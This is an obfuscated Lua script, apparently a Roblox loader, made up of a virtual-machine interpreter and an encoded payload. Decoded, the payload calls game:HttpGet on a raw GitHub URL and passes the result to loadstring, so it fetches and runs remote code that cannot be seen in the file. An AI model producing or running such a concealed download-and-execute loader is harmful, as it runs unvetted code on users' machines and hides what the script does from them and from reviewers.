--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (951 -(282 + 595)))))) ;return v70-(v70%(569 -(367 + (1838 -(1523 + 114))))) ;else local v71=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==((1 + 0) -0)) then return (v37 * 256) + v36 ;end if (v35==(957 -(892 + 65))) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + (2377 -1380))) );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23()local v38=(326 -146) -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -(0 + 0))) then v39,v40,v41,v42=v1(v16,v18,v18 + ((1004 -(915 + 82)) -4) );v18=v18 + (7 -3) ;v38=1;end if (v38==(351 -(87 + 263))) then return (v42 * 16777216) + (v41 * (66488 -(802 + 150))) + (v40 * ((1950 -1261) -433)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 + 0 ,12 + 8 ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,21,70 -39 );local v48=((v20(v44,69 -37 )==(1 + 0 + 0)) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 -0)) then return v48 * (18 -(10 + 8)) ;else local v76=(772 -(201 + 571)) -0 ;while true do if (v76==(442 -(416 + 26))) then v47=3 -2 ;v45=0 + 0 ;break;end end end elseif (v47==((4759 -(116 + 1022)) -1574)) then return ((v46==(438 -((603 -458) + 293))) and (v48 * (1/(430 -(26 + 18 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((7 -5)^(1538 -(998 + 488))))) ;end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==(10 -7)) then return v6(v52);end if (v50==(861 -(814 + 45))) then v52={};for v77=2 -1 , #v51 do v52[v77]=v2(v1(v3(v51,v77,v77)));end v50=1 + 2 ;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=887 -((1235 -974) + 624) ;end if (v50==0) then v51=nil;if  not v49 then local v93=0;while true do if (v93==(0 -(0 + 0))) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=(4902 -3478) -(630 + 793) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(0 + 0)) then v54=0 -0 ;v55=nil;v53=1 + 0 ;end if (v53==(1 + 1)) then v58=nil;v59=nil;v53=8 -5 ;end if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=2;end if (v53~=(1 + 2)) then else v60=nil;v61=nil;v53=4 + 0 ;end if ((2 + 2)~=v53) then else while true do if (v54==1) then v57=nil;v58=nil;v54=2;end if ((1004 -(938 + 63))==v54) then v61=nil;while true do local v99=529 -(406 + 123) ;while true do if (v99==(1769 -(1749 + 20))) then local v104=0 + 0 ;while true do if (v104==(1 + 0)) then v99=1323 -(1249 + 73) ;break;end if (v104~=0) then else if (v55==1) then local v149=0 + 0 ;while true do if (1==v149) then for v159=1146 -(466 + 679) ,v60 do local v160=1613 -(1565 + 48) ;local v161;local v162;local v163;local v164;while true do if ((0 -0)~=v160) then else v161=0;v162=nil;v160=1139 -(782 + 356) ;end if (v160==(5 -3)) then while true do if (v161==(1900 -(106 + 1794))) then v162=0 -0 ;v163=nil;v161=1;end if (v161==(1093 -(975 + 117))) then v164=nil;while true do if (v162==(1875 -(157 + 1718))) then local v173=0 + 0 ;local v174;while true do if (v173==(0 + 0)) then v174=0 -0 ;while true do if (v174==0) then local v184=0 + 0 ;local v185;while true do if (v184==(0 -0)) then v185=1018 -(697 + 321) ;while true do if (v185==(2 -1)) then v174=1;break;end if (v185~=(0 -0)) then else local v189=0 -0 ;while true do if (v189~=(115 -(4 + 110))) then else v185=585 -(57 + 527) ;break;end if (v189==(1427 -(41 + 1386))) then v163=v21();v164=nil;v189=104 -(17 + 86) ;end end end end break;end end end if (v174==(1 + 0)) then v162=1228 -(322 + 905) ;break;end end break;end end end if (v162==(1 -0)) then if (v163==(1190 -(449 + 740))) then v164=v21()~=(872 -(826 + 46)) ;elseif (v163==(5 -3)) then v164=v24();elseif (v163==(169 -(122 + 44))) then v164=v25();end v61[v159]=v164;break;end end break;end end break;end if (1~=v160) then else v163=nil;v164=nil;v160=2;end end end v59[5 -2 ]=v21();v149=6 -4 ;end if (v149~=(0 + 0)) then else v60=v23();v61={};v149=3 -2 ;end if (v149==(1900 -(260 + 1638))) then v55=2 + 0 ;break;end end end if (v55~=0) then else local v150=440 -(382 + 58) ;while true do if ((1 + 0)==v150) then v58={};v59={v56,v57,nil,v58};v150=5 -3 ;end if (v150==(1259 -(1043 + 214))) then v55=3 -2 ;break;end if (v150~=(0 -0)) then else v56={};v57={};v150=1213 -(323 + 889) ;end end end v104=2 -1 ;end end end if (v99==(581 -(361 + 219))) then if (v55==(322 -(53 + 267))) then local v126=0;local v127;while true do if (v126~=0) then else v127=683 -(483 + 200) ;while true do if (v127==(0 + 0)) then local v156=413 -(15 + 398) ;while true do if ((1 -0)==v156) then v127=1;break;end if (v156==(982 -(18 + 964))) then for v165=3 -2 ,v23() do local v166=0;local v167;local v168;local v169;while true do if ((1 + 0)==v166) then v169=nil;while true do if (0~=v167) then else local v176=0 + 0 ;local v177;while true do if (v176==(850 -(20 + 830))) then v177=0;while true do if (v177~=(0 + 0)) then else local v186=0;while true do if (v186==(0 -0)) then v168=0 + 0 ;v169=nil;v186=127 -(116 + 10) ;end if (1==v186) then v177=1 + 0 ;break;end end end if (v177~=(739 -(542 + 196))) then else v167=1 -0 ;break;end end break;end end end if (v167~=(1 + 0)) then else while true do if ((0 + 0)==v168) then v169=v21();if (v20(v169,1 + 0 ,1 + 0 )~=(0 -0)) then else local v178=0 -0 ;local v179;local v180;local v181;local v182;local v183;while true do if (v178~=0) then else v179=0;v180=nil;v178=1 + 0 ;end if (v178==(1553 -(1126 + 425))) then v183=nil;while true do if (v179~=(407 -(118 + 287))) then else while true do if (v180==(1 + 0)) then local v190=163 -(92 + 71) ;local v191;while true do if ((0 + 0)==v190) then v191=0 -0 ;while true do if (v191~=1) then else v180=1123 -(118 + 1003) ;break;end if (v191==(0 -0)) then local v200=377 -(142 + 235) ;while true do if ((0 + 0)==v200) then v183={v22(),v22(),nil,nil};if (v181==0) then local v201=0;local v202;local v203;while true do if (v201~=0) then else v202=0;v203=nil;v201=1 + 0 ;end if (v201==(850 -(254 + 595))) then while true do if (v202==(0 + 0)) then v203=977 -(553 + 424) ;while true do if (v203==(0 -0)) then v183[3 + 0 ]=v22();v183[4 + 0 ]=v22();break;end end break;end end break;end end elseif (v181==(2 -1)) then v183[3]=v23();elseif (v181==(2 + 0)) then v183[1 + 2 ]=v23() -((1 + 1)^(10 + 6)) ;elseif (v181~=3) then else local v206=0;local v207;while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207==(0 -0)) then v183[1 + 2 ]=v23() -((9 -7)^(769 -(239 + 514))) ;v183[2 + 2 ]=v22();break;end end break;end end end v200=1;end if (v200~=(1 + 0)) then else v191=1330 -(797 + 532) ;break;end end end end break;end end end if (v180==(0 + 0)) then local v192=0 + 0 ;while true do if (v192==0) then v181=v20(v169,4 -2 ,809 -(118 + 688) );v182=v20(v169,1206 -(373 + 829) ,2 + 4 );v192=1887 -(927 + 959) ;end if (v192~=1) then else v180=3 -2 ;break;end end end if (v180~=2) then else if (v20(v182,1,733 -(16 + 716) )~=(1 -0)) then else v183[733 -(476 + 255) ]=v61[v183[1132 -(369 + 761) ]];end if (v20(v182,2,2 + 0 )==(286 -(175 + 110))) then v183[3]=v61[v183[3]];end v180=5 -2 ;end if (3==v180) then if (v20(v182,5 -2 ,6 -3 )==1) then v183[4]=v61[v183[242 -(64 + 174) ]];end v56[v165]=v183;break;end end break;end if (v179==(1 + 0)) then local v187=0 -0 ;while true do if ((0 -0)~=v187) then else v182=nil;v183=nil;v187=1;end if (v187==(337 -(144 + 192))) then v179=2 + 0 ;break;end end end if (v179==0) then local v188=0;while true do if (v188~=(1061 -(810 + 251))) then else v180=216 -(42 + 174) ;v181=nil;v188=1 + 0 ;end if (v188==(1 + 0)) then v179=1 + 0 ;break;end end end end break;end if (v178~=(1 + 0)) then else v181=nil;v182=nil;v178=1 + 1 ;end end end break;end end break;end end break;end if ((1504 -(363 + 1141))==v166) then local v172=0 -0 ;while true do if ((860 -(240 + 619))==v172) then v166=1581 -(1183 + 397) ;break;end if (v172==(0 -0)) then v167=0 + 0 ;v168=nil;v172=1 + 0 ;end end end end end for v170=1745 -(1344 + 400) ,v23() do v57[v170-(406 -(255 + 150)) ]=v28();end v156=1976 -(1913 + 62) ;end end end if (v127~=(1 + 0)) then else return v59;end end break;end end end break;end end end break;end if (v54==0) then local v97=0 + 0 ;while true do if (v97==(2 -1)) then v54=1934 -(565 + 1368) ;break;end if (v97~=(1739 -(404 + 1335))) then else v55=0;v56=nil;v97=1;end end end if (v54==2) then local v98=0 -0 ;while true do if (v98==(1662 -(1477 + 184))) then v54=3 -0 ;break;end if ((0 + 0)~=v98) then else v59=nil;v60=nil;v98=1;end end end end break;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=3) then if (v92<=1) then if (v92==0) then local v105=v91[2];local v106,v107=v82(v89[v105](v13(v89,v105 + 1 ,v91[3])));v84=(v107 + v105) -1 ;local v108=0;for v128=v105,v84 do local v129=0;while true do if (0==v129) then v108=v108 + 1 ;v89[v128]=v106[v108];break;end end end else local v109=0;local v110;local v111;local v112;local v113;local v114;while true do if (v109==3) then v89[v114 + 1 ]=v113;v89[v114]=v113[v91[4]];v83=v83 + 1 ;v91=v79[v83];v109=4;end if (v109==4) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v114=v91[2];v109=5;end if (v109==5) then v111,v112=v82(v89[v114](v13(v89,v114 + 1 ,v91[3])));v84=(v112 + v114) -1 ;v110=0;for v153=v114,v84 do local v154=0;while true do if (v154==0) then v110=v110 + 1 ;v89[v153]=v111[v110];break;end end end v109=6;end if (v109==2) then v83=v83 + 1 ;v91=v79[v83];v114=v91[2];v113=v89[v91[3]];v109=3;end if (v109==7) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v109=8;end if (v109==6) then v83=v83 + 1 ;v91=v79[v83];v114=v91[2];v89[v114]=v89[v114](v13(v89,v114 + 1 ,v84));v109=7;end if (v109==0) then v110=nil;v111,v112=nil;v113=nil;v114=nil;v109=1;end if (v109==8) then v91=v79[v83];do return;end break;end if (v109==1) then v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v109=2;end end end elseif (v92>2) then local v115=v91[2];v89[v115]=v89[v115](v13(v89,v115 + 1 ,v84));else v89[v91[2]]=v64[v91[3]];end elseif (v92<=5) then if (v92==4) then v89[v91[2]]=v91[3];else local v121=v91[2];local v122=v89[v91[3]];v89[v121 + 1 ]=v122;v89[v121]=v122[v91[4]];end elseif (v92==6) then do return;end else v89[v91[2]]();end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F447261676F6E6B756E672F447261676F6E6B756E672F6D61696E2F322E74787400083O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);